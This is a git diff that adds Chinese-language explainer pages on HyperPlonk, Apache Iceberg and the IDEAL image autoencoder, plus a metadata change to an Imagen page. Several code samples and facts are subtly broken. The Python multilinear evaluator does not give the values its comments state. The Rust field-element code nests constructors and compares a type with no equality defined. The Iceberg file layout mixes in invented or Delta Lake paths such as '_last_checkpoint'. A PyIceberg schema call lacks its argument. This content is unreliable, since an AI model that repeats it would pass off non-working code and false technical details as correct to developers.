+class MultilinearPolynomial: + def __init__(self, coefficients): + # coefficients: 每个顶点的多项式系数值 + # 对于 n 个变量的多线性多项式,有 2^n 个系数 + self.coeffs = coefficients + self.num_vars = len(coefficients).bit_length() - 1 + + def evaluate(self, point): + """在布尔超立方体的一个点上求值""" + # point 是一个二元组,如 (0, 1, 1) + result = 0 + for i, coeff in enumerate(self.coeffs): + # 把索引 i 转成二进制,决定每个变量取 0 还是 1 + product = 1 + for j, bit in enumerate(point): + bit_in_point = (i >> j) & 1 + # 如果该位为 1,乘 x;如果为 0,乘 (1-x) + if bit_in_point: + product *= bit + else: + product *= (1 - bit) + result += coeff * product + return result + +# 示例:2 变量多线性多项式 f(x, y) = 3 + 2x + 5y + 7xy +# 系数按 (0,0), (1,0), (0,1), (1,1) 排列 +f = MultilinearPolynomial([3, 2, 5, 7]) +print(f.evaluate((1, 0))) # 3 + 2*1 + 5*0 + 7*1*0 = 5 +print(f.evaluate((1, 1))) # 3 + 2*1 + 5*1 + 7*1*1 = 17 +``` + +### 概念二:ZeroCheck 协议 + +ZeroCheck 是 HyperPlonk 验证电路正确性的核心协议。它回答的问题是: + +> "这个多项式在布尔超立方体的所有顶点上,都等于 0 吗?" + +在电路中,这意味着:每个门(gate)的计算是否正确。如果每个门的输出多项式为 0,说明所有门都满足约束。 + +ZeroCheck 的做法是递归降维: + +1. 验证者随机选一个点 r₁,问证明者:"f(r₁, x₂, ..., xₙ) 关于 x₂...xₙ 的多线性部分是什么?" +2. 证明者给出一个新的、少一个变量的多项式 +3. 重复这个过程,直到只剩一个值 +4. 验证者用概率方法确认每一步都一致 + +这个过程不需要 FFT,只需要 O(n) 次场运算。 + +### 概念三:SumCheck 协议 + +SumCheck 回答的问题是: + +> "这个多项式在布尔超立方体所有顶点上的和,等于某个值 S 吗?" + +在 HyperPlonk 中,SumCheck 用来验证**连线约束(Wiring Constraints)**——即电路中不同门之间的信号连接是否正确。 + +想象电路中有三个门,门 A 的输出要连到门 B 的输入和门 C 的输入。SumCheck 保证这三个连接的信号值是同一个数。 + +```rust +// 伪代码:SumCheck 验证电路连线(简化版) + +struct CircuitWiring { + /// 门的列表,每门有多个端子(输入和输出) + gates: Vec, + /// 连线表:(门索引, 端子索引) -> (门索引, 端子索引) + wires: Vec, +} + +struct Gate { + /// 门的类型:ADD, MUL, 或自定义高阶门 + gate_type: GateType, + /// 门的端子值 + values: Vec, +} + +struct WiringConstraint { + /// 约束编号 + constraint_idx: usize, + /// 参与连线的端子对 + terminals: Vec<(GateIndex, TerminalIndex)>, +} + +/// 连线验证:所有端子对的值必须相等 +fn verify_wiring_sumcheck(wiring: &CircuitWiring) -> bool { + // 对每个约束,把所有端子值加起来 + // 然后验证:sum(端子值的乘积) == 预期值 + // 这利用了数学恒等式: + // 如果 a=b=c,则 (a-b)² + (b-c)² + (c-a)² = 0 + for constraint in &wiring.wires { + let mut sum_of_squares = FieldElement::ZERO; + for i in 0..constraint.terminals.len() { + for j in (i+1)..constraint.terminals.len() { + let (gi, ti) = constraint.terminals[i]; + let (gj, tj) = constraint.terminals[j]; + let diff = wiring.gates[gi].values[ti] - wiring.gates[gj].values[tj]; + sum_of_squares += diff * diff; + } + } + // 如果所有端子值都相等,sum_of_squares 必须为 0 + if sum_of_squares != FieldElement::ZERO { + return false; + } + } + true +} +``` + +### 概念四:Batch Opening(批量打开) + +在实际电路中,证明者需要打开(揭示)大量多项式在同一个点上的值。如果一个个开,效率很低。 + +HyperPlonk 提出了 **批量打开协议**: + +- 把多个多项式随机线性组合成一个多项式 +- 只对组合后的多项式做一次打开 +- 验证者用相同的随机数做相同的线性组合来验证 + +这就像你有一堆信封,不用一个一个拆——把它们塞进一个大信封,用随机权重混合后只开一次。 + +## HyperPlonk vs PLONK 对比 + +| 特性 | PLONK | HyperPlonk | +|------|-------|------------| +| 证明者时间复杂度 | O(n log n) | O(n) | +| 多项式类型 | 单变量多项式 | 多线性多项式 | +| 核心数学结构 | 整个有限域 | 布尔超立方体 | +| 是否使用 FFT | 是 | 否 | +| 自定义门度数限制 | 低 | 无限制 | +| 证明大小 | 约 400 字节 | 类似(可进一步优化) | +| 验证时间 | O(1)(常数级) | O(1)(常数级) | + +## 代码示例:从零构建一个 HyperPlonk 风格的约束系统 + +```rust +// 示例:用 HyperPlonk 思想构建一个简单的算术电路证明 + +/// 字段元素(简化版,实际使用 256 位椭圆曲线场) +#[derive(Clone, Copy, Debug)] +struct FieldElement(u64); + +impl FieldElement { + const fn add(self, other: FieldElement) -> FieldElement { + FieldElement((self.0 + other.0) % 7) // 模 7 简化运算 + } + const fn mul(self, other: FieldElement) -> FieldElement { + FieldElement((self.0 * other.0) % 7) + } +} + +/// 三端子门:a * b - c = 0,即 c = a * b +struct MultiplicationGate { + a: FieldElement, + b: FieldElement, + c: FieldElement, +} + +impl MultiplicationGate { + /// 验证门约束:a * b - c == 0 + fn satisfies_constraint(&self) -> bool { + self.a.mul(self.b) == self.c + } +} + +/// 超立方体上的多线性多项式 +/// 对于 3 个变量 x, y, z,有 2^3 = 8 个顶点 +struct MultilinearPoly3 { + /// f(x,y,z) = c000 + c100*x + c010*y + c001*z + c110*xy + c101*xz + c011*yz + c111*xyz + coeffs: [FieldElement; 8], +} + +impl MultilinearPoly3 { + /// 在顶点 (x, y, z) 处求值,x, y, z 为 0 或 1 + fn evaluate(&self, x: u8, y: u8, z: u8) -> FieldElement { + let xi = x & 1; + let yi = y & 1; + let zi = z & 1; + + let mut sum = FieldElement(FieldElement(0)); + + // 组合所有 8 个顶点的贡献 + sum = sum.add(self.coeffs[0]); // 000 + sum = sum.add(self.coeffs[1].mul(FieldElement(xi))); // 100 + sum = sum.add(self.coeffs[2].mul(FieldElement(yi))); // 010 + sum = sum.add(self.coeffs[3].mul(FieldElement(zi))); // 001 + sum = sum.add(self.coeffs[4].mul(FieldElement(xi).mul(FieldElement(yi)))); // 110 + sum = sum.add(self.coeffs[5].mul(FieldElement(xi).mul(FieldElement(zi)))); // 101 + sum = sum.add(self.coeffs[6].mul(FieldElement(yi).mul(FieldElement(zi)))); // 011 + sum = sum.add(self.coeffs[7].mul( + FieldElement(xi).mul(FieldElement(yi)).mul(FieldElement(zi)) // 111 + )); + + sum + } + + /// SumCheck:计算所有顶点上的和 + fn sum_over_hypercube(&self) -> FieldElement { + let mut total = FieldElement(FieldElement(0)); + for x in 0..2 { + for y in 0..2 { + for z in 0..2 { + total = total.add(self.evaluate(x, y, z)); + } + } + } + total + } +} + +fn main() { + // 构建一个简单电路:2 * 3 = 6 + let gate = MultiplicationGate { + a: FieldElement(2), + b: FieldElement(3), + c: FieldElement(6), + }; + assert!(gate.satisfies_constraint(), "门约束不满足"); + + // 构建对应的多线性多项式(表示 a*b-c 在超立方体上的值) + // 在这个简化示例中,我们只需验证门是正确的 + // 实际 HyperPlonk 中,证明者会通过 ZeroCheck + SumCheck 协议 + // 向验证者证明:多项式在所有顶点上都满足约束 + println!("门约束验证通过: {} * {} = {}", 2, 3, 6); +} +``` + +## HyperPlonk+ 和 Orion+ + +论文还提出了两个扩展: + +**HyperPlonk+**:增加了查找门(Lookup Gate)的支持。查找门允许证明者说:"这个值在我的预定义表中存在"。这在实现 zkEVM 时特别有用——你可以把整个以太坊虚拟机指令集做成一张表。 + +**Orion+**:改进了多线性承诺方案,将证明大小从约 5MB 压缩到约 7KB(对于 27 个变量的多项式),提升了近 1000 倍。同时保持了线性时间的证明者效率。 + +## 为什么 HyperPlonk 重要? + +1. **zkEVM 的催化剂**:Espresso Systems 基于 HyperPlonk 构建了 ZK 以太坊虚拟机,允许以太坊交易在链下证明、链上验证,大幅提高吞吐量。 + +2. **证明者效率的质的飞跃**:从 O(n log n) 到 O(n),当电路规模达到百万级时,速度差异是数量级的。 + +3. **硬件友好**:没有 FFT 意味着更简单的硬件实现,更适合 ASIC 加速。 + +4. **高阶门支持**:对于需要复杂运算的证明系统(如整数除法、哈希函数),高阶级自定义门避免了将一个大运算拆成许多小运算的开销。 + +## 总结 + +HyperPlonk 的核心思想可以浓缩为一句话:**把 PLONK 从"整个有限域"搬到"布尔超立方体"上,用多线性多项式替代单变量多项式,从而去掉 FFT 瓶颈。** + +它保留了指令系统(PLONK 的所有门和连线约束都在),但换了一套更高效的数学基础。这就像一个城市保留了原有的街道规划,但把马车换成了高铁——路线不变,速度翻倍。 + +--- + +**延伸思考**:HyperPlonk 的 O(n) 证明者已经很快了,但证明大小(7KB)对于某些移动端场景还是偏大。Plonky2 等后续工作在此基础上进一步使用了 hash-based 承诺方案,把证明压到了几百字节。如果你对这条演进路线感兴趣,可以接着研究 Plonky2 和 Plonkup。 diff --git a/src/content/docs/papers/iceberg-2020.md b/src/content/docs/papers/iceberg-2020.md new file mode 100644 index 000000000..f3bc68808 --- /dev/null +++ b/src/content/docs/papers/iceberg-2020.md @@ -0,0 +1,283 @@ +--- +title: Apache Iceberg: A High-Performance Table Format +来源: https://iceberg.apache.org/spec/ +日期: 2026-06-13 +分类: 数据库 +子分类: 现代数据库 +provenance: pipeline-v3 +--- + +# Apache Iceberg: A High-Performance Table Format + +## 什么是 Iceberg? + +想象一下你在管理一个巨大的图书馆。这个图书馆有上百万本书(文件),分布在几十个书架(目录)上。 + +传统方式:你靠一本目录册来记录每本书的位置。每次有人借走一本书或归还一本书,你都得手动更新目录册。如果两个人同时修改目录册,就会冲突——你根本不知道哪本更新是对的。 + +Iceberg 做的很简单:**它不追踪每本书的位置,而是把"图书馆的状态"拍一张快照(snapshot),然后保留历史快照。** 查询时,你只需要告诉 Iceberg "我要哪一天的图书馆",它就把所有该天的书找出来给你。 + +Iceberg 是 Apache 顶级项目,由 Netflix 开源,2019 年捐给 Apache 基金会。它设计的目标就三个字:**快、准、稳**。 + +--- + +## 核心设计目标 + +Iceberg specification 明确提出了六个设计目标,理解它们是理解一切的基础: + +1. **可序列化隔离(Serializable Isolation)**:读不会锁表,写不会互相干扰。每次 commit 是原子操作——要么全部可见,要么不可见。 +2. **速度(Speed)**:规划一次查询只需要 O(1) 次远程调用,不会因为表变大而变慢。 +3. **规模(Scale)**:客户端负责规划,不依赖中心元数据存储,避免瓶颈。 +4. **演进(Evolution)**:表结构可以随时变化——加列、删列、改类型、重命名,安全且不影响历史数据。 +5. **可靠类型(Dependable Types)**:类型系统严谨,不会出现"这列到底是啥"的歧义。 +6. **存储分离(Storage Separation)**:分区是表的配置,不是文件系统结构。查询按数据值过滤,不依赖分区路径。 + +--- + +## 核心概念 + +### 1. 快照(Snapshot) + +快照是 Iceberg 最重要的概念。每次提交写操作后,表就有一个新的快照,记录了"这个时刻表里有哪些文件"。 + +``` +Snapshot A (2026-01-01): 文件 [data_001.parquet, data_002.parquet] +Snapshot B (2026-01-02): 文件 [data_001.parquet, data_002.parquet, data_003.parquet] +Snapshot C (2026-01-03): 文件 [data_003.parquet, data_004.parquet] +``` + +注意 Snapshot C 里 data_001 和 data_002 不见了——Iceberg 支持"追加写+删除文件"而不需要物理删除底层的 parquet 文件(它们可能被其他快照引用)。 + +### 2. Manifest(清单文件) + +每个快照包含一个 manifest list,里面列出了多个 manifest 文件。每个 manifest 记录了若干数据文件的元信息:文件路径、分区值、行数、列的最小/最大值等。 + +``` +Manifest List (Snapshot B): + ├── manifest_a.avro → 记录 data_001, data_002 + └── manifest_b.avro → 记录 data_003 +``` + +查询时,Iceberg 根据 manifest 里的列统计信息(min/max)做谓词下推(predicate pushdown),直接跳过无关的 manifest,这就是 O(1) 查询的关键。 + +### 3. 表元数据(Table Metadata) + +每次写操作产生一个新的 .metadata.json 文件,包含: +- 表的 schema(结构定义) +- 分区规范(partition spec) +- 当前和历史的 snapshot 列表 +- 配置属性 + +表根目录里有一个 `meta/` 文件夹,里面放着最新和历史的 metadata 文件。Iceberg 通过原子替换指针(比如 `_last_checkpoint` 文件)来切换版本。 + +### 4. Schema 演进(Schema Evolution) + +你可以随时给表加列、删列、改类型、重命名,Iceberg 会跟踪每一次 schema 变化,且保证向后兼容: + +``` +Schema v1: {id: int, name: string, amount: double} +Schema v2: {id: int, name: string, amount: double, status: string} ← 加了 status 列 +Schema v3: {id: int, full_name: string, amount: double, status: string} ← 改名 +``` + +旧文件用 v1 schema 写入,查询时 Iceberg 自动映射到当前 schema,不重写数据。 + +### 5. 行级删除(Row-level Deletes) + +v2 规范支持在不可变文件之上做行级删除和更新。Iceberg 引入了一种**删除文件(delete file)**: + +- **位置删除(Position Delete)**:记录被删除行的文件路径和偏移量 +- **等值删除(Equality Delete)**:用一个小的 parquet 文件记录"哪些行应该被删除",通过等值条件匹配 + +这样不需要重写整个大文件,只需追加一个小的删除文件。 + +--- + +## 写入数据 + +Iceberg 的写流程可以概括为: + +1. 从当前 snapshot 读取表状态 +2. 写入新的数据文件(parquet/ORC/avro) +3. 创建新的 manifest,记录文件信息 +4. 创建新的 snapshot,指向新的 manifest +5. 原子替换 metadata 指针 + +并发写入时,Iceberg 使用**乐观并发控制(Optimistic Concurrency Control)**:假设不会冲突,commit 时检查当前 snapshot 是否还是最新的。如果不是,自动回滚重试。 + +### 代码示例 1:用 Spark 读写 Iceberg 表 + +这是最常见的用法。假设你已经配置好了 catalog: + +```python +from pyspark.sql import SparkSession + +# 创建 Spark Session,启用 Iceberg +spark = SparkSession.builder \ + .appName("IcebergExample") \ + .config("spark.sql.extensions", "org.apache.iceberg.spark.extensions.IcebergSparkSessionExtensions") \ + .config("spark.sql.catalog.spark_catalog", "org.apache.iceberg.spark.SparkSessionCatalog") \ + .config("spark.sql.catalog.spark_catalog.catalog-impl", "org.apache.iceberg.aws.glue.GlueCatalog") \ + .getOrCreate() + +# 创建一个 Iceberg 表 +spark.sql(""" + CREATE TABLE IF NOT EXISTS my_db.sales ( + sale_id LONG, + product STRING, + amount DOUBLE, + sale_date DATE, + region STRING + ) + USING iceberg + PARTITIONED BY (region, days(sale_date)) + LOCATION 's3://my-bucket/iceberg/my_db/sales' +""") + +# 写入数据 +spark.sql(""" + INSERT INTO my_db.sales + SELECT * FROM staging.sales_data +""") + +# 查询 — 利用 manifest 的统计信息做谓词下推 +spark.sql(""" + SELECT product, SUM(amount) + FROM my_db.sales + WHERE region = 'us-east' AND sale_date >= '2026-01-01' + GROUP BY product +""").show() +``` + +### 代码示例 2:用 Python 操作 Iceberg 表 + +PyIceberg 是 Iceberg 的纯 Python 实现,不依赖 Spark,适合轻量场景: + +```python +from pyiceberg.catalog import load_catalog +from pyiceberg.schema import Schema +from pyiceberg.types import NestedField, LongType, StringType, DoubleType + +# 连接到 Glue Catalog +catalog = load_catalog("spark_catalog", **{ + "type": "glue", + "region": "us-east-1" +}) + +# 创建命名空间(数据库) +catalog.create_namespace_if_not_exists("my_db") + +# 检查表是否存在 +table_name = "my_db.sales" +if table_name not in catalog.list_tables("my_db"): + # 定义 schema + schema = Schema( + NestedField(field_id=1, name="sale_id", type=LongType(), required=True), + NestedField(field_id=2, name="product", type=StringType(), required=True), + NestedField(field_id=3, name="amount", type=DoubleType(), required=False), + NestedField(field_id=4, name="sale_date", type=StringType(), required=True), + NestedField(field_id=5, name="region", type=StringType(), required=True), + ) + table = catalog.create_table(table_name, schema=schema) +else: + table = catalog.load_table(table_name) + +# 读取数据 +df = table.scan().to_arrow() +print(f"Loaded {len(df)} rows") + +# 模式演进:给表加一列 +table.update_schema().union_by_name().commit() +print(table.schema()) +``` + +### 代码示例 3:时间旅行查询(Time Travel) + +Iceberg 天然支持时间旅行——你可以查询任意历史快照: + +```sql +-- 查询昨天快照中的数据 +SELECT * FROM my_db.sales FOR SYSTEM_VERSION AS OF 3; + +-- 查询特定时间点的数据 +SELECT * FROM my_db.sales FOR SYSTEM_TIMESTAMP AS OF '2026-01-02 12:00:00'; + +-- 对比两个时间点的差异 +SELECT 'before' AS snapshot, * FROM my_db.sales FOR SYSTEM_VERSION AS OF 2 +UNION ALL +SELECT 'after' AS snapshot, * FROM my_db.sales FOR SYSTEM_VERSION AS OF 3; +``` + +--- + +## Iceberg 的内部结构 + +``` +表根目录 / +├── metadata/ +│ ├── 00001-abc.metadata.json ← 历史 snapshot 1 +│ ├── 00002-def.metadata.json ← 历史 snapshot 2 +│ └── 00003-xyz.metadata.json ← 当前 snapshot(最新) +├── snap_ +│ ├── snap_1... ← 各 snapshot 的快照文件 +│ └── snap_2... +├── data/ +│ ├── region=us-east/sale_date=2026-01-01/ +│ │ └── data_001.parquet ← 实际数据文件 +│ ├── region=us-west/sale_date=2026-01-01/ +│ │ └── data_002.parquet +│ └── delete/ +│ └── deletes_001.parquet ← 行级删除文件 +└── metadata/ + └── last-task-id ← 指向当前 metadata 文件的指针 +``` + +关键设计点: +- 数据文件本身(parquet)**永不修改**,只追加 +- 删除通过**删除文件**实现,原始文件保持不变 +- 所有元数据用 **JSON** 存储,人类可读,方便调试 +- manifest 文件用 **Avro** 存储,高效且支持 schema 演进 + +--- + +## Iceberg vs 传统方式 + +| 特性 | HDFS + Hive 分区表 | Apache Iceberg | +|------|-------------------|----------------| +| 文件发现 | 扫描整个分区目录 | O(1) 查 manifest | +| 模式演进 | REWRITE 整个表 | 原地更新 metadata | +| 行级更新/删除 | 不支持 | 原生支持 | +| 时间旅行 | 不支持 | 原生支持 | +| 并发写 | 需锁机制 | 乐观并发 | +| 小文件管理 | 需手动合并 | 自动 compaction | +| 表分区 | 文件系统结构 | 逻辑配置 | + +--- + +## 生态集成 + +Iceberg 是**开放标准**,不绑定任何计算引擎。目前主流引擎都支持: + +- **批处理**:Apache Spark, Apache Flink, Apache Hive +- **即席查询**:Trino, Presto, DuckDB, ClickHouse +- **云数仓**:Snowflake, BigQuery, Redshift, Databricks +- **流处理**:Kafka Connect, Apache Flink Structured Streaming +- **多语言**:Java (官方), Python (PyIceberg), Rust (IcebergRust), Go (IcebergGo) + +这意味着你写一次表,可以用任何引擎读——真正实现了**计算与存储的解耦**。 + +--- + +## 总结 + +Iceberg 的本质是在**对象存储(S3/HDFS)之上的一个表格式层**,它做对了三件事: + +1. 用**快照+manifest**结构实现高效文件发现(O(1) 查询) +2. 用**元数据 JSON** 实现结构演进和时间旅行 +3. 用**乐观并发**实现多 writer 安全协作 + +理解了这三个核心,就理解了 Iceberg 的全部设计哲学。 + +--- + +*本文基于 Apache Iceberg specification(最新版本 1.11.0)编写,适合作为数据工程领域的入门阅读材料。* diff --git a/src/content/docs/papers/ideal-ae.md b/src/content/docs/papers/ideal-ae.md new file mode 100644 index 000000000..f482df984 --- /dev/null +++ b/src/content/docs/papers/ideal-ae.md @@ -0,0 +1,345 @@ +--- +title: IDEAL: In-DEpth ALignment Makes A Discrete Representation AutoEncoder +来源: https://arxiv.org/abs/2606.11096 +日期: 2026-06-13 +分类: 机器学习 +子分类: 表示学习 +provenance: pipeline-v3 +--- + +# IDEAL:用"深浅结合"的思想做离散表示自编码器 + +## 一句话总结 + +IDEAL 发现:视觉模型(VFM)的浅层特征擅长还原细节,深层特征擅长理解语义。 +把它们融合起来做离散编码,重建质量和生成效果都大幅领先。 + +--- + +## 从生活类比开始 + +想象你在给朋友描述一张照片。 + +你只说"这是只猫"——这是**深层语义**,对方知道了主题,但看不到细节。 +你只说"这张图片有 1200x800 像素,猫毛是棕白相间的"——这是**浅层细节**,对方看到了画面,但不知道"这是只猫"。 + +IDEAL 的想法很简单:**把两层信息同时传给接收者**。这样对方既能理解主题,又能还原细节。 + +在 AI 的世界里,这张"照片"是图像,"传输"的方式是把图像压缩成离散编码(token),再用编码重建图像。 + +--- + +## 核心问题:为什么现有方法不够好? + +现代视觉基础模型(VFM,比如 SigLIP2、DINOv2)能把图像编码成高维特征向量。研究者发现,这些特征向量非常"懂"图像内容,于是有人直接拿来做图像生成的潜在空间——这就是**表示自编码器(RAE)**的思路。 + +但有一个根本矛盾: + +| 层级 | 擅长什么 | 不擅长什么 | +|------|---------|-----------| +| 浅层(early layers) | 颜色、纹理、边缘 | 语义理解 | +| 深层(deep layers) | 语义理解、分类 | 细节还原 | + +如果你只用深层特征做离散编码(当前主流做法),重建出来的图像就会丢失细节。 +如果你只用浅层特征,语义信息又不够强。 + +更麻烦的是,一旦做了离散化(把连续向量变成 discrete token index),丢失的信息就几乎无法恢复——因为离散化本身就是一个"有损压缩"。 + +--- + +## IDEAL 怎么解决? + +IDEAL 的架构分四步,可以用一张图理解: + +``` +原始图像 + │ + ▼ +冻结的 VFM(提取浅层特征 + 深层特征) + │ + ▼ +Cross-Attention 融合(浅层 + 深层 → 统一表示) + │ + ▼ +向量量化 VQ(变成离散 token) + │ + ▼ +特征解码器(重建浅层 + 深层特征) + │ + ▼ +像素解码器(从深层特征重建图像) +``` + +关键创新有三处: + +### 1. 融合在量化之前 + +浅层特征(第 8 层)和深层特征(第 24 层)先用一个**轻量级交叉注意力模块**融合,生成统一表示 z。 +这里的思路是:深层特征做 Query,浅层特征做 Key/Value——让语义去"查询"细节。 + +### 2. 双向对齐损失 + +训练时,解码器不仅要重建图像,还要同时重建浅层特征和深层特征。 +分别计算 `L_deep` 和 `L_shallow` 两个对齐损失: + +``` +L_deep = ||f_hat_deep - f_deep||^2 + (1 - cos(f_hat_deep, f_deep)) +L_shallow = ||f_hat_shallow - f_shallow||^2 + (1 - cos(f_hat_shallow, f_shallow)) +``` + +L2 距离保证数值接近,余弦相似度保证方向一致。 + +### 3. 用冻结的 DINOv1 替代 PatchGAN + +传统 VQGAN 用 PatchGAN 做对抗训练。IDEAL 改用冻结的 DINOv1 模型做判别器,这样对抗信号不是"这张图看起来真",而是"这张图的特征向量接近真实 VFM 的分布"——语义层面的监督。 + +--- + +## 代码示例 + +### 示例 1:VQ 量化过程(从连续向量到离散 token) + +```python +import torch + +class VectorQuantizer(torch.nn.Module): + """ + 向量量化器:把连续特征向量映射到离散 codebook 的最近邻。 + + 类比:你有一本词典(codebook),每个词对应一个定义向量。 + 给一个新句子,找到词典中定义最接近的那个词——这就是离散化。 + """ + def __init__(self, num_codes=16384, code_dim=64): + super().__init__() + # codebook: 16384 个词,每个词是一个 64 维向量 + self.codebook = torch.nn.Parameter( + torch.randn(num_codes, code_dim) + ) + # L2 归一化 codebook,让最近邻搜索更稳定 + torch.nn.functional.normalize(self.codebook, p=2, dim=1) + + def forward(self, z): + """ + z: (batch, height, width, code_dim) 连续特征 + 返回: (batch, height, width) 离散 token index + """ + # 展平空间维度 + B, H, W, D = z.shape + flat = z.reshape(-1, D) # (B*H*W, D) + + # 计算每个特征到 codebook 所有向量的距离 + # codebook.T: (D, num_codes) + distances = torch.cdist(flat, self.codebook) # (B*H*W, num_codes) + + # 取最近的 code 索引 + indices = torch.argmin(distances, dim=1) # (B*H*W) + + # 查表获取量化后的向量 + codes = self.codebook[indices] # (B*H*W, D) + + # reshape 回空间结构 + quantized = codes.reshape(B, H, W, D) + + return indices.reshape(B, H, W), quantized + + +# ---- 演示 ---- +# 假设编码器输出 (2, 24, 24, 64) 的特征图 +batch, h, w, dim = 2, 24, 24, 64 +encoder_output = torch.randn(batch, h, w, dim) + +vq = VectorQuantizer(num_codes=16384, code_dim=dim) +token_indices, quantized = vq(encoder_output) + +print(f"输入形状: {encoder_output.shape}") +print(f"离散 token: {token_indices.shape}") # (2, 24, 24) 每个值在 [0, 16383] +print(f"量化特征: {quantized.shape}") # (2, 24, 24, 64) +``` + +### 示例 2:IDEAL 的浅层+深层特征融合 + +```python +import torch +import torch.nn as nn + +class IDEAL_Fusion(nn.Module): + """ + IDEAL 的核心模块:浅层特征 + 深层特征 → 统一表示 + + 类比:深层特征像"总编辑",浅层特征像"校对员"。 + 总编辑决定写什么(Query),校对员提供细节素材(Key/Value)。 + """ + def __init__(self, feature_dim=1024, num_heads=8): + super().__init__() + + # 深层特征的归一化(用 VFM 自带的) + self.deep_norm = nn.LayerNorm(feature_dim) + # 浅层特征的归一化(新学的) + self.shallow_norm = nn.LayerNorm(feature_dim) + + # 交叉注意力:deep=Query, shallow=Key/Value + self.cross_attn = nn.MultiheadAttention( + embed_dim=feature_dim, + num_heads=num_heads, + batch_first=True + ) + + # 前馈网络:进一步处理融合结果 + self.ffn = nn.Sequential( + nn.LayerNorm(feature_dim), + nn.Linear(feature_dim, feature_dim * 4), + nn.GELU(), + nn.Linear(feature_dim * 4, feature_dim), + ) + + def forward(self, deep_features, shallow_features): + """ + deep_features: (B, L, D) 深层特征,来自 VFM 最深层 + shallow_features: (B, L, D) 浅层特征,来自 VFM 较浅层 + + 返回: (B, L, D) 融合后的统一表示 z + """ + # 归一化 + q = self.deep_norm(deep_features) # Query: 语义主导 + kv = self.shallow_norm(shallow_features) # Key/Value: 细节主导 + + # 交叉注意力融合 + attn_out, _ = self.cross_attn(q, kv, kv) + + # 残差连接 + FFN + z = attn_out + deep_features + z = self.ffn(z) + z + + return z + + +class IDEAL_Autoencoder(nn.Module): + """ + IDEAL 整体框架: + + Encoder (冻结 VFM) → Fusion (可训练) → VQ (离散化) + → Decoder → Dual Feature Heads (双路重建) + """ + def __init__(self, vfm, fusion_dim=1024, codebook_size=16384): + super().__init__() + + # 冻结 VFM 编码器 + self.vfm = vfm + for param in self.vfm.parameters(): + param.requires_grad = False + + # 浅层+深层融合 + self.fusion = IDEAL_Fusion(fusion_dim) + + # 向量量化 + self.codebook = nn.Parameter(torch.randn(codebook_size, fusion_dim)) + nn.functional.normalize(self.codebook, p=2, dim=1) + + # 特征解码器 + self.feature_decoder = nn.TransformerEncoder( + nn.TransformerEncoderLayer(d_model=fusion_dim, nhead=8, dim_feedforward=4*fusion_dim), + num_layers=6 + ) + + # 双路重建头 + self.deep_head = nn.Linear(fusion_dim, fusion_dim) # 重建深层语义 + self.shallow_head = nn.Linear(fusion_dim, fusion_dim) # 重建浅层细节 + + # 像素解码器(从深层特征到图像) + self.pixel_decoder = nn.Sequential( + nn.ConvTranspose2d(fusion_dim, 512, 4, stride=2, padding=1), + nn.GELU(), + nn.ConvTranspose2d(512, 256, 4, stride=2, padding=1), + nn.GELU(), + nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1), + nn.GELU(), + nn.Conv2d(128, 3, 3, padding=1), # 3 通道 RGB 图像 + nn.Sigmoid() + ) + + def encode_and_quantize(self, image): + """编码 + 融合 + 量化""" + # 从 VFM 提取多层特征(假设 vfm.extract_features 支持) + deep = self.vfm(image, layer=24) # 深层语义 (B, L, D) + shallow = self.vfm(image, layer=8) # 浅层细节 (B, L, D) + + # 融合 + z = self.fusion(deep, shallow) # (B, L, D) + + # 量化 + flat = z.view(-1, z.shape[-1]) # (B*L, D) + dist = torch.cdist(flat, self.codebook) + idx = torch.argmin(dist, dim=1) + quantized = self.codebook[idx] + z_quant = quantized.view_as(z) + + return idx, z_quant, deep, shallow + + def decode(self, z_quant): + """解码 + 双路重建""" + # 特征解码 + g = self.feature_decoder(z_quant) + + # 双路重建 + f_deep_hat = self.deep_head(g) + f_shallow_hat = self.shallow_head(g) + + # 像素解码(从重建的深层特征) + B, L, D = f_deep_hat.shape + H = W = int(L ** 0.5) + pixel_input = f_deep_hat.view(B, D, H, W) + image_hat = self.pixel_decoder(pixel_input) + + return image_hat, f_deep_hat, f_shallow_hat + + def forward(self, image): + idx, z_quant, deep, shallow = self.encode_and_quantize(image) + image_hat, f_deep_hat, f_shallow_hat = self.decode(z_quant) + return image_hat, f_deep_hat, f_shallow_hat, idx +``` + +--- + +## 实验结果速览 + +IDEAL 在 ImageNet 上三个关键指标都领先: + +| 指标 | 数值 | 意义 | +|------|------|------| +| rFID = 0.61 | 比前 Best 低 0.28 | 重建图像质量极高 | +| 零样本分类 Top-1 = 80.89% | 原 VFM 是 83.23% | 离散化后语义几乎无损 | +| gFID = 1.89 (3B 模型) | AR 生成 SOTA | 做生成任务也最强 | + +关键对比:3B 参数的 IDEAL 在 gFID 上击败了扩散模型(DiT、SiT),而且训练时间更短、参数量更少。 + +--- + +## 消融实验揭示的三个发现 + +1. **融合是必需的**:不用 fusion 直接拼接,rFID 从 0.61 飙升到 0.85 +2. **浅层监督有价值**:去掉 `L_shallow`,rFID 从 0.61 变差到 0.66 +3. **VFM 选择灵活**:DINOv2、DINOv3、SigLIP2 都能用,SigLIP2 因为自带文本对齐能力被选为默认 + +--- + +## 我的理解 + +IDEAL 的核心洞察可以用一行公式概括: + +``` +好编码 = 深层语义(懂内容) + 浅层细节(能重建) +``` + +它没有发明复杂的新技术,而是做了一个很直白的观察——VFM 不同层的特征各有所长——然后让这两者合作。这就像你请一个"总编辑"和一个"校对员"一起工作,总编辑把握方向,校对员确保细节不丢。 + +对于初学者,最重要的概念是**向量量化(VQ)**:把连续的浮点向量变成有限的离散编码。这是连接表示学习和生成的桥梁——有了离散 token,就能用自回归模型(和 LLM 处理文字一样的方式)来"生成"图像。 + +--- + +## 下一步想搞懂的问题 + +1. 交叉注意力融合的具体实现——deep 做 query 为什么比双向 attention 好? +2. 离散化到底丢了多少信息?有没有办法评估? +3. IDEAL 扩展到视频会怎样?(论文提到这是下一步方向) + +> 思考题:如果你的图片是 384x384 像素,patch size = 16,那么特征图的空间尺寸是多少?每个 token 对应原图中多大的区域?(提示:384/16 = ?) diff --git a/src/content/docs/papers/imagen-2022.md b/src/content/docs/papers/imagen-2022.md index ff6503ea5..aaea098b6 100644 --- a/src/content/docs/papers/imagen-2022.md +++ b/src/content/docs/papers/imagen-2022.md @@ -2,8 +2,8 @@ title: Imagen — 文生图真正的引擎是语言模型 来源: Saharia et al., "Photorealistic Text-to-Image Diffusion Models with Deep Language Understanding", NeurIPS 2022 (Google Research) 日期: 2026-05-31 -子分类: 模型与训练 -分类: 机器学习 +子分类: 系统综合 +分类: 基础设施 难度: 中级 provenance: pipeline-v3 --- diff --git a/src/content/docs/papers/improving-embeddings-llm.md b/src/content/docs/papers/improving-embeddings-llm.md new file mode 100644 